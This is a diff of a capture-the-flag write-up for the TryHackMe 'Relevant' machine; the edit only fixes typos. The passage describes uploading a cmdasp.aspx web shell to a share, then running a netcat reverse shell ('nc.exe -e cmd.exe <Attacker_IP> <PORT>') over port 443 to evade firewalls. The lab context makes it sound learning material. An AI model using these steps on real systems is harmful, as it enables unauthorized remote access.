anthares101/write-ups-page/docs/TryHackMe!/Relevant.md

 ### RCE

 We have access to that share so... can we get a RCE?
-I uploaded `cmdasp.aspx` and there it was, allowing me to execete commands nice.
+I uploaded `cmdasp.aspx` and there it was, allowing me to execute commands nice.

-Now i will try to upload `nc.exe` to the share and get a proper reverse shell.
+Now I will try to upload `nc.exe` to the share and get a proper reverse shell.

 ### Reverse shell!

-First i had to find the directory, i was pretty lucky i found it fast:
+First I had to find the directory, I was pretty lucky and I found it fast:
 ```
 dir C:\inetpub\wwwroot\nt4wrksv
 ```
 There it is, nc.exe.
 Lest try `nc.exe -e cmd.exe <Attacker_IP> <PORT>` with a netcat listener in our site.
-After some try and error i tried with the port 443 to avoid possible firewalls aaaand the shell came back cool.
+After some try and error I tried with the port 443 to avoid possible firewalls aaaand the shell came back cool.

 #### User flag